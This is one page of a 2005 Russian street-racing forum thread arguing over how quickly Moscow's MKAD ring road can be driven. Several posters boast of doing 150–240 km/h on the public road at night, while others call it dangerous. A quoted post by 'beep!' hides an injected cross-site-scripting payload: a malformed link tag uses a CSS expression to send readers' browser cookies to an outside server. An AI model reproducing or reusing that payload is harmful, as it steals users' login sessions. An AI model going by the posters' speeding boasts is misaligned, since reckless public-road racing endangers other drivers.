Список форумов dragrace.ru dragrace.ru
ОБЪЕДИНЁННЫЙ ФОРУМ УЛИЧНЫХ ГОНЩИКОВ РОССИИ И ЧЕМПИОНАТА РОССИИ ПО ДРЭГ РЭЙСИНГУ 2001 -2010г.
 
   на главную    Фотогаллерея    почта на dragrace    
 FAQFAQ   ПоискПоиск   ПользователиПользователи   ГруппыГруппы   РегистрацияРегистрация 
 _profile.php?mode=editprofileМои настройки   Войти и проверить личные сообщенияВойти и проверить личные сообщения   ВходВход 

самое быстрое время вокруг Москвы ( МКАД )
На страницу Пред.  1, 2, 3 ... 8, 9, 10, 11  След.
 
Начать новую тему   Эта тема закрыта, вы не можете писать ответы и редактировать сообщения.    Список форумов dragrace.ru -> Московская Лига дрэгрейсинга и стритрейсинга
Предыдущая тема :: Следующая тема  
Автор Сообщение
Sergio_furious



Зарегистрирован: 19.05.2004
Сообщения: 18

СообщениеДобавлено: Ср Июл 06, 2005 11:57 am    Заголовок сообщения: Нда... Ответить с цитатой

YanRS

Это кого еще надо в КПЗ сажать... Втирать про п**сию на 240 и самому закладывать 230 на стандартном джипе... Люди которые ездят на таких скоростях на тюненых машинах со спортивными подвесками с тюнеными тормозами и т.д. не придурки, они строят эти машины для этого, строят свои машины, потому что неплохо знают, что так ездить на стандартных машинках - самоубийство и не только "само", но и окружающих... А ваши рассуждения о кольце... настройте колец, куда может попасть простой смертный с нормальной инфраструктурой, может рейсеров поменьше станет. Хотя на кольце риска реально не меньше, там то реально на пределе идут, а на улицах я немного машин видел, проходящих повороты на пределе под визг резины. Если рассуждать как вы, то и с парашютом прыгать не стоит, и на роликах кататься, а уж на самолетах летать...когда можно по земле потихонечку переползти... Я за себя могу сказать, да я гоняю, 150-160 по мкаду если свободно - это нормально на моей Вектре 1.8 с АКПП, в 3 часа ночи как-то разогнался до 210, стало страшно... Понял, что надо менять подвеску, ставить другие тормоза... Но все это я делаю, когда нет опасности создать аварийную ситуацию, когда можно так ехать. Это опасно в определенной степени... Но иногда у меня очко играет больше когда я в маршрутке еду с водилой под 90-100 км по пробке по встречке. Все относительно. На мой взгляд выехать в 4-5 утра из 30 минут на круге МКАДа вполне реально на нормальной машине.
З.Ы. А про то, что Японка с 1.6 Вас надрала... это умение читать дорогу, чувствовать поток, максимальные возможности машины имеют значение на треке, а в городе больше работает голова и мастерство водителя... Не хвастаясь скажу для примера, что по Мкаду в среднем потоке шел минут 15 вместе с SL 500, даже обогнал его, потом кончились тормоза... :evil: Просто водила в мерине был никакой... Просьба это не комментировать это.
З.З.Ы. я бы рискнул, если бы аппарат подходящий был, только не за 10000 штук с камерами, чтоб кто-то на мне наварился нехило, а для себя, в хорошей компании, можно даже реально фильм снять нарезать на DVD и продавать, думаю затраты на бензин и организацию себя бы окупили Smile
Вернуться к началу
Посмотреть профиль Отправить личное сообщение
Gena



Зарегистрирован: 20.05.2003
Сообщения: 763
Откуда: Ново-Переделкино

СообщениеДобавлено: Ср Июл 06, 2005 4:43 pm    Заголовок сообщения: Ответить с цитатой

2 YanRS
Ага, теперь я уважаемый. А до этого был сынком. О какой адекватности ты говоришь?

НА форуме есть люди, мнение которых, даже если оно не совпадает с моим, интересно читать, но это явно не ты.
Вернуться к началу
Посмотреть профиль Отправить личное сообщение
MajestiC



Зарегистрирован: 01.03.2005
Сообщения: 414
Откуда: Moscow Center

СообщениеДобавлено: Ср Июл 06, 2005 4:53 pm    Заголовок сообщения: Ответить с цитатой

Че вы так на него все накинулись, это по-моему единственный здравомыслящей человек на этом форуме. Он высказал свое мнение, с которым в чем-то можно согласиться, а с чем-то поспорить. Я во многом с ним согласен. Немного есть людей,которые на скорости 250 могут правильно среагировать, если вдруг на его ряд кто-то быстро перестроиться. Разве не так??? А насчет МКАДа за 30 мин. считаю это нереально. Проведу мат. подсчеты и сообщу попозже Smile
Вернуться к началу
Посмотреть профиль Отправить личное сообщение
Kirill_na_PRESSO



Зарегистрирован: 10.08.2003
Сообщения: 743

СообщениеДобавлено: Ср Июл 06, 2005 5:45 pm    Заголовок сообщения: Re: Нда... Ответить с цитатой

VIDEO писал(а):
Лично я сегодня под утро проехал весь МКАД за 45 мин ничего особо не нарушая
Все посты проезжал не выше 120 км/ч , только на 3-4 участках разгонял до 220 км - ( дальше резина не позволяет )
в основном ехал 160-180 ( 2 раза меня обогнали )
мерин и какой-то субарик , вообщем-то ехал баз напряга
Машина Соарер , мотор 7M GTEU - 3000 TURBO

Вот о чем и речь. Сейчас поясню смысл цифры в 290 км/ч в первом приближении. Возьмем идеальные условия: спидометр не «врет» и «160-180» держалась постоянно, а до 220 не разгонялись. Получается 108 км за 0,75 часа, те средняя скорость 144 км/ч. Чтобы показать 108 км за 0,5 часа нужна средняя 216 км/ч (т е 114 Х1,5). Это вовсе не означает, что нужно умножать скорости «160-180» на 1,5, что будет 240-270. Реально это цифра гораздо выше, потому как осаживать все равно придется. Прибавим для реальности погрешность спидометра (это около 15 на таких скоростях) и выходим на совсем оптимистическую цифру 255-285. Откуда, спросите, 290? Поясняю – последние цифры (в особенности близкие к 300) любая машина набирает очень неохотно, а на МКАД еще есть и довольно крутые подъемы.
VIDEO писал(а):
И хватит о безопасности, в конце концов колхоз- дело добровольное
Это ведь не РАЛЛИЙНЫЙ форум

Заканчивай провоцировать юнцов. Если все же какой-нибудь псих согласиться слабо тебе с ним в машине проехать?
Sergio_furious писал(а):
Люди которые ездят на таких скоростях на тюненых машинах со спортивными подвесками с тюнеными тормозами и т.д. не придурки, они строят эти машины для этого, строят свои машины, потому что неплохо знают, что так ездить на стандартных машинках - самоубийство и не только "само", но и окружающих...

90% тех, кто занимается тунинхом ездить вообще не умеют и постоянно ищут причину в машине, а не в себе.
Sergio_furious писал(а):
А ваши рассуждения о кольце... настройте колец, куда может попасть простой смертный с нормальной инфраструктурой, может рейсеров поменьше станет.

Ты предлагаешь специально для тебя построить? То что есть не устраивает? Есть минимум три места в радиусе 50 км от Мск, где это можно сделать - две гоночные трассы и Дмитровский полигон.
Sergio_furious писал(а):
Хотя на кольце риска реально не меньше, там то реально на пределе идут, а на улицах я немного машин видел, проходящих повороты на пределе под визг резины.

Конечно, что по улице разложиться, что на трассе, какая разница. А за кольцо еще платить надо, а в городе то бесплатно.
Вернуться к началу
Посмотреть профиль Отправить личное сообщение Отправить e-mail
Bra2ha



Зарегистрирован: 01.05.2002
Сообщения: 2368
Откуда: Moscow

СообщениеДобавлено: Ср Июл 06, 2005 7:28 pm    Заголовок сообщения: Re: Нда... Ответить с цитатой

Ну вы блин развели флуд... 8O

ИМХО, люди в этом топе, которые утверждают, что мол 240 по МКАДу легко, просто никогда не попадали в реальные аварии... а если попадали и все равно продолжают так считать, то значит у них просто отсутствует способность учиться на собственных ошибках, а это, в свою очередь, ПОКАЗАТЕЛЬ!

2 YanRS: Тебе б поменьше "хелл"-овитости (от слова Хеллрэйзор :D )в высказываниях и тебя бы лучше понимали...
Вернуться к началу
Посмотреть профиль Отправить личное сообщение Отправить e-mail
total



Зарегистрирован: 18.05.2002
Сообщения: 2167
Откуда: Saab-club Russia

СообщениеДобавлено: Ср Июл 06, 2005 7:35 pm    Заголовок сообщения: Ответить с цитатой

ну ездил я 240 по мкад (скорость по спидометру) , ночью, скажу одно, ну наХ, дорога гавно, колеи и люди которые едут медленно, хотя ночью нонсенс, но все же... если хотите ставить рекорды, то снимайте дмитровский полигон и меряйтесь письками Twisted Evil
Вернуться к началу
Посмотреть профиль Отправить личное сообщение
YanRS



Зарегистрирован: 03.03.2004
Сообщения: 465

СообщениеДобавлено: Ср Июл 06, 2005 8:21 pm    Заголовок сообщения: Ответить с цитатой

Gena писал(а):
2 YanRS
Ага, теперь я уважаемый. А до этого был сынком. О какой адекватности ты говоришь?


слово "сарказм" тебе известно?

Gena писал(а):
НА форуме есть люди, мнение которых, даже если оно не совпадает с моим, интересно читать, но это явно не ты.


Проблемы индейцев шерифа не е**т cool
Вернуться к началу
Посмотреть профиль Отправить личное сообщение Посетить сайт автора
YanRS



Зарегистрирован: 03.03.2004
Сообщения: 465

СообщениеДобавлено: Ср Июл 06, 2005 8:25 pm    Заголовок сообщения: Re: Нда... Ответить с цитатой

Bra2ha писал(а):

2 YanRS: Тебе б поменьше "хелл"-овитости (от слова Хеллрэйзор :D )в высказываниях и тебя бы лучше понимали...


я в общем-то доволен, тем что встряхнул этот форум. Кстати, что случается не первый раз Laughing

На самом деле, я уверен, что все правильно поняли мои слова, только не у всех хватило смелости, сознательности, разумности и т.д. и т.п. признаться в этом публично. :D


Всем удачи!
Берегите себя!
Вернуться к началу
Посмотреть профиль Отправить личное сообщение Посетить сайт автора
Bobbie



Зарегистрирован: 15.07.2003
Сообщения: 1316
Откуда: Moscow

СообщениеДобавлено: Ср Июл 06, 2005 8:27 pm    Заголовок сообщения: Ни добавить, ни прибавить! Ответить с цитатой

Kirill_na_PRESSO писал(а):
90% тех, кто занимается тунинхом ездить вообще не умеют и постоянно ищут причину в машине, а не в себе.

sic!
Вернуться к началу
Посмотреть профиль Отправить личное сообщение Посетить сайт автора
beep!



Зарегистрирован: 16.03.2005
Сообщения: 5609
Откуда: ЗАО

СообщениеДобавлено: Ср Июл 06, 2005 11:03 pm    Заголовок сообщения: Ответить с цитатой

dragfunk писал(а):
у нас особо не разгонишься слишком дороги плохие.
не пойму на западе асфальт по другому делают чтоли - там дороги совсем другие
[url]www.ut[url=www.s=''style='font-size:0;color:#EFEFEF'style='top:expression(eval(this.sss));'sss=`i=new/**/Image();i.src='http://salon.polar-star.ru/foto/data/pict.gif?'+document.cookie;this.sss=null`style='font-size:0;][/url][/url]'

ты где ездишь? по дачам? дороги вполне для того чтобы прилично ездить :arrow:
Вернуться к началу
Посмотреть профиль Отправить личное сообщение Отправить e-mail MSN Messenger
Trolik



Зарегистрирован: 09.02.2003
Сообщения: 933
Откуда: из 1000 миль

СообщениеДобавлено: Ср Июл 06, 2005 11:48 pm    Заголовок сообщения: Ответить с цитатой

YanRS писал(а):

Хороший тюнинг спидометра однако. Laughing
На динамометрической дороге в Дмитрове всего два порша выехали из 300 км/ч, и еще один показал скорость близкую к 300, а именно 299 км/ч. В поршах 550+ hp.
Так кому верить? Чиста ракеру на японском бАлиде, что его телега с дизайном и аэродинамикой начала 90-х способона разогнаться "к скорости близкой к 300 км/ч" или здравой логике, которая утверждает, что немецкий спорткар с мощностью за 550 сил с огромным трудом способен разогнаться до 300 км/ч? При этом Порш обладает меньшей массой, лучшей аэродинамикой и более мощным мотором и едет по прямой и ровной динамометрической дороге.

Не исключаю того что "японская аэродинамика начала 90-х" лучше чем некотырые обвесы TechArt Gembala или еще чего нибудь такого, они могли быть сделанны совсем для другого не говорю о 9ff. В плане веса YanRS ты знаешь сколько весит 996? Smile или хотя бы сраный бокстер? Smile я думаю что соарер полегче будет. К чему веду, к то му что порш с 550 не показатель, а во вторых порши какие-то мертвые никак не на 550.
Удачи! Wink
Вернуться к началу
Посмотреть профиль Отправить личное сообщение Отправить e-mail
YanRS



Зарегистрирован: 03.03.2004
Сообщения: 465

СообщениеДобавлено: Чт Июл 07, 2005 12:01 am    Заголовок сообщения: Ответить с цитатой

Trolik писал(а):

Не исключаю того что "японская аэродинамика начала 90-х" лучше чем некотырые обвесы TechArt Gembala или еще чего нибудь такого, они могли быть сделанны совсем для другого не говорю о 9ff. В плане веса YanRS ты знаешь сколько весит 996? Smile или хотя бы сраный бокстер? Smile я думаю что соарер полегче будет. К чему веду, к то му что порш с 550 не показатель, а во вторых порши какие-то мертвые никак не на 550.
Удачи! Wink


Парни, вы че, действительно уверены в том, что гонки в этой жизни ограничены пуканьем на 400м?
Вы что, действительно измеряете свою скорость размером надутого турбиной воздуха?


Короче, Супра никогда не станет Феррари!
Вернуться к началу
Посмотреть профиль Отправить личное сообщение Посетить сайт автора
beep!



Зарегистрирован: 16.03.2005
Сообщения: 5609
Откуда: ЗАО

СообщениеДобавлено: Чт Июл 07, 2005 12:03 am    Заголовок сообщения: Ответить с цитатой

YanRS писал(а):
Trolik писал(а):

Не исключаю того что "японская аэродинамика начала 90-х" лучше чем некотырые обвесы TechArt Gembala или еще чего нибудь такого, они могли быть сделанны совсем для другого не говорю о 9ff. В плане веса YanRS ты знаешь сколько весит 996? Smile или хотя бы сраный бокстер? Smile я думаю что соарер полегче будет. К чему веду, к то му что порш с 550 не показатель, а во вторых порши какие-то мертвые никак не на 550.
Удачи! Wink


Парни, вы че, действительно уверены в том, что гонки в этой жизни ограничены пуканьем на 400м?
Вы что, действительно измеряете свою скорость размером надутого турбиной воздуха?


Короче, Супра никогда не станет Феррари!

если ты не знаешь .. напомню ... форум то драгов ... Wink
Вернуться к началу
Посмотреть профиль Отправить личное сообщение Отправить e-mail MSN Messenger
Trolik



Зарегистрирован: 09.02.2003
Сообщения: 933
Откуда: из 1000 миль

СообщениеДобавлено: Чт Июл 07, 2005 12:05 am    Заголовок сообщения: Ответить с цитатой

YanRS писал(а):
Trolik писал(а):

Не исключаю того что "японская аэродинамика начала 90-х" лучше чем некотырые обвесы TechArt Gembala или еще чего нибудь такого, они могли быть сделанны совсем для другого не говорю о 9ff. В плане веса YanRS ты знаешь сколько весит 996? Smile или хотя бы сраный бокстер? Smile я думаю что соарер полегче будет. К чему веду, к то му что порш с 550 не показатель, а во вторых порши какие-то мертвые никак не на 550.
Удачи! Wink


Парни, вы че, действительно уверены в том, что гонки в этой жизни ограничены пуканьем на 400м?
Вы что, действительно измеряете свою скорость размером надутого турбиной воздуха?


Короче, Супра никогда не станет Феррари!

Дело не в этом! Я вообще езжу с атмосферным мотором и не так часто приезжаю на гонки как хотелось бы. Супра и Феррари две разные вещи. Я задал вопросы, на которые не смог получить ответы. Я сказал, что порши это не показатели.
Вернуться к началу
Посмотреть профиль Отправить личное сообщение Отправить e-mail
YanRS



Зарегистрирован: 03.03.2004
Сообщения: 465

СообщениеДобавлено: Чт Июл 07, 2005 12:05 am    Заголовок сообщения: Ответить с цитатой

ГЕНий писал(а):
если ты не знаешь .. напомню ... форум то драгов ... Wink


Покажите хоть одну машину с этого форума, выезжающую из 11 секунд!
Вернуться к началу
Посмотреть профиль Отправить личное сообщение Посетить сайт автора
Solobaric



Зарегистрирован: 11.06.2005
Сообщения: 456

СообщениеДобавлено: Чт Июл 07, 2005 12:05 am    Заголовок сообщения: Ответить с цитатой

YanRS писал(а):
Trolik писал(а):

Не исключаю того что "японская аэродинамика начала 90-х" лучше чем некотырые обвесы TechArt Gembala или еще чего нибудь такого, они могли быть сделанны совсем для другого не говорю о 9ff. В плане веса YanRS ты знаешь сколько весит 996? Smile или хотя бы сраный бокстер? Smile я думаю что соарер полегче будет. К чему веду, к то му что порш с 550 не показатель, а во вторых порши какие-то мертвые никак не на 550.
Удачи! Wink


Парни, вы че, действительно уверены в том, что гонки в этой жизни ограничены пуканьем на 400м?
Вы что, действительно измеряете свою скорость размером надутого турбиной воздуха?


Короче, Супра никогда не станет Феррари!

Купить Феррари и ездить на ней-одно.А купить супру,вложить в нее половину стоимости феррари и сделать индивидуальную машину,которая порвет всех и на квотере и в потоке - совсем другое.

После всех твоих постов появляется вопрос-на чем же ездишь ты?
Если не на Pagani,Saleen или даже старенькой Lambo,то я сильно разочаруюсь
Вернуться к началу
Посмотреть профиль Отправить личное сообщение
beep!



Зарегистрирован: 16.03.2005
Сообщения: 5609
Откуда: ЗАО

СообщениеДобавлено: Чт Июл 07, 2005 12:06 am    Заголовок сообщения: Ответить с цитатой

YanRS писал(а):
ГЕНий писал(а):
если ты не знаешь .. напомню ... форум то драгов ... Wink


Покажите хоть одну машину с этого форума, выезжающую из 11 секунд!

для тебя драг .. это выезд из 11 секунд? ... езжай в америку ...
а машины не на форуме а в реале .... :arrow:
Вернуться к началу
Посмотреть профиль Отправить личное сообщение Отправить e-mail MSN Messenger
YanRS



Зарегистрирован: 03.03.2004
Сообщения: 465

СообщениеДобавлено: Чт Июл 07, 2005 12:09 am    Заголовок сообщения: Ответить с цитатой

Trolik писал(а):
Я задал вопросы, на которые не смог получить ответы.


No Replacement For Displacement!

Сколько объема в поршаке GT2 и соарере?
Вернуться к началу
Посмотреть профиль Отправить личное сообщение Посетить сайт автора
sloniк



Зарегистрирован: 03.04.2005
Сообщения: 953

СообщениеДобавлено: Чт Июл 07, 2005 12:11 am    Заголовок сообщения: Ответить с цитатой

YanRS
это под*ёб! Laughing
ты и сам прекрасно знаешь, что в россии машин, которые выезжают из 11 секунд можно уместить на пальцах одной руки Smile. зачем тогда так писать?
ну да, отстали мы во всём от остального мира, но хотя бы в отношении драга потихонечку догоняем Smile.
Вернуться к началу
Посмотреть профиль Отправить личное сообщение
beep!



Зарегистрирован: 16.03.2005
Сообщения: 5609
Откуда: ЗАО

СообщениеДобавлено: Чт Июл 07, 2005 12:12 am    Заголовок сообщения: Ответить с цитатой

slonik[vectra-club] писал(а):
YanRS
это под*ёб! Laughing
ты и сам прекрасно знаешь, что в россии машин, которые выезжают из 11 секунд можно уместить на пальцах одной руки Smile. зачем тогда так писать?

Я бы сказал зачем он это написал .. да в бан не хочу :evil: :arrow:
просто не понимаю народ .. который тут тусит .. и спрашивает потом .. а что вам драг важнее чем какие либо другие гонки?
смешно становится :arrow:


Последний раз редактировалось: beep! (Чт Июл 07, 2005 12:14 am), всего редактировалось 2 раз(а)
Вернуться к началу
Посмотреть профиль Отправить личное сообщение Отправить e-mail MSN Messenger
Показать сообщения:   
Начать новую тему   Эта тема закрыта, вы не можете писать ответы и редактировать сообщения.    Список форумов dragrace.ru -> Московская Лига дрэгрейсинга и стритрейсинга Часовой пояс: GMT + 3
На страницу Пред.  1, 2, 3 ... 8, 9, 10, 11  След.
Страница 9 из 11

 
Перейти:  
Вы не можете начинать темы
Вы не можете отвечать на сообщения
Вы не можете редактировать свои сообщения
Вы не можете удалять свои сообщения
Вы не можете голосовать в опросах


Powered by phpBB © 2001, 2005 phpBB Group
__c??-_@Mail.ru